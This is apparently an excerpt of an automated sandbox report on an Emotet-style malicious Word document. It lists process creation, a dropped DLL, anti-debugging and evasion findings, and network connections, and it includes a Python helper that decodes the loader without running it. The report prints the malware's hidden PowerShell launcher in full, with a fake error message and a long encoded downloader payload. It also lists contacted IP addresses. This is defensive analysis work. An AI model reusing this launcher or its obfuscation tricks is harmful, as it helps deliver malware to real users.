Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnA
CsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD ...
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD ... Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD ...
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD ... Jump to behavior
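The -ENCOD argument recorded above is base64 over UTF-16LE text, and the decoded script assembles every sensitive string piece by piece (the -F format operator, 'a'+'b' concatenation, cosmetic backticks inside member names, [char] constants), so neither the command line nor a naive strings dump shows System.IO.Directory or the name of the dropped DLL. The Python below is an added triage helper, not part of this report or of Joe Sandbox: it decodes the blob and then folds those constructs back into plain literals, purely textually, without executing anything. SAMPLE_B64 is the first 184 characters of the encoded command in this report; SAMPLE_PLAIN is a constructed line modelled on later statements of the same decoded script (the variable names are the ones it uses) and is not a verbatim excerpt.

```python
"""Decode and fold an Emotet-style PowerShell '-EncodedCommand' payload.

Added triage helper, not part of the sandbox report. It performs the first two
steps of analysing the 'POwersheLL -w hidden -ENCOD ...' line recorded above:
base64 -> UTF-16LE decoding, then undoing the string-building tricks the loader
uses (cosmetic backticks, 'a'+'b' concatenation, the -F format operator and
[char]N constants). Nothing is executed.
"""
import base64
import re

# Excerpt: the first 184 base64 characters of the encoded command in this report,
# cut on an 8-character boundary so the UTF-16LE decode stays aligned.
SAMPLE_B64 = (
    "IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsA"
    "MwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkA"
    "JwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsA"
)

# Constructed plaintext modelled on later statements of the same command (the
# variable names are the ones the decoded script uses); not a verbatim excerpt.
SAMPLE_PLAIN = (
    "$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;"
    "$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4')+('.d'+'ll');"
    "$Sep=[chaR]92;"
)

# Real PowerShell backtick escapes (lowercase only); a backtick before any other
# character is purely cosmetic and can be dropped.
_REAL_ESCAPES = "0abefnrtuv"

_CHAR_CONST = re.compile(r"\[cha?r\]\s*\(?\s*(\d+)\s*\)?", re.I)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_PAREN_LITERAL = re.compile(r"\(\s*('[^']*')\s*\)")
_FORMAT = re.compile(
    r"\(\s*\"((?:\{\d+\})+)\"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)", re.I)


def decode_encoded_command(b64):
    """powershell.exe -EncodedCommand takes base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_backticks(script):
    """Drop cosmetic backticks: cR`E`A`TedIrecTorY -> cREATedIrecTorY (real escapes such as `n survive)."""
    return re.sub(r"`([^%s`])" % _REAL_ESCAPES, r"\1", script)


def _resolve_format(m):
    # ("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.') -> 'sYSteM.IO.DIrecTorY'
    args = re.findall(r"'([^']*)'", m.group(2))
    order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(1))]
    return "'" + "".join(args[i] for i in order) + "'"


def fold_string_ops(script):
    """Repeatedly collapse [char]N, 'a'+'b', ('x') and -F expressions into literals."""
    prev = None
    while prev != script:
        prev = script
        script = _CHAR_CONST.sub(lambda m: "'%s'" % chr(int(m.group(1))), script)
        script = _CONCAT.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), script)
        script = _PAREN_LITERAL.sub(r"\1", script)
        script = _FORMAT.sub(_resolve_format, script)
    return script


def deobfuscate(script):
    return fold_string_ops(strip_backticks(script))


if __name__ == "__main__":
    print(deobfuscate(decode_encoded_command(SAMPLE_B64)))
    print(deobfuscate(SAMPLE_PLAIN))
```

The excerpt decodes to ` $F2OMYj  = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.');` and folds to `[tYPe]'sYSteM.IO.DIrecTorY'`, i.e. System.IO.Directory, which the script uses to create the directory under the user profile that Yvtlx6p4.dll is later written to (the path in the "Drops PE files" entry below). The constructed line folds to the same file name, `'Yvtlx6p4.dll'`. The folding is purely textual: expressions that depend on runtime state, such as the -replace calls that rebuild the download URL list and the Get-Variable indirection further into the script, are left untouched, and a complete reconstruction needs the PowerShell AST or script-block logging in an isolated VM.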
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_10013BFB
PE file contains an invalid checksum
Source: Yvtlx6p4.dll.5.dr Static PE information: real checksum: 0x4a297 should be: 0x40b13
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B0BD push ecx; ret 7_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007BCA push ecx; ret 7_2_10007BDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001BCE92 push cs; retf 8_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006ACE92 push cs; retf 11_2_006ACE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001ECE92 push cs; retf 13_2_001ECE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0068CE92 push cs; retf 15_2_0068CE94

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lkvi\ejqhpm.twa:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yffe\xmxs.xtt:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yxkq\vxcyp.vst:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Glql\mritqo.dtl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xlll\midsk.ptl:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qpvq\ojxkj.pqe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ljbn\kwuw.ehe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Doth\isebmn.lpx:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2356 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002E75F0 FindFirstFileW, 17_2_002E75F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 00000007.00000002.2094842307.000000000032D000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind 7_2_10002460
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10007528
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_10013BFB
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A76B2 mov eax, dword ptr fs:[00000030h] 7_2_002A76B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B6AB2 mov eax, dword ptr fs:[00000030h] 8_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002176B2 mov eax, dword ptr fs:[00000030h] 10_2_002176B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_006A6AB2 mov eax, dword ptr fs:[00000030h] 11_2_006A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007276B2 mov eax, dword ptr fs:[00000030h] 12_2_007276B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001E6AB2 mov eax, dword ptr fs:[00000030h] 13_2_001E6AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002276B2 mov eax, dword ptr fs:[00000030h] 14_2_002276B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00686AB2 mov eax, dword ptr fs:[00000030h] 15_2_00686AB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002E76B2 mov eax, dword ptr fs:[00000030h] 17_2_002E76B2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10004500
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10007528
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10009F26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10006F64

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 167.71.148.58 187
Encrypted powershell cmdline option found
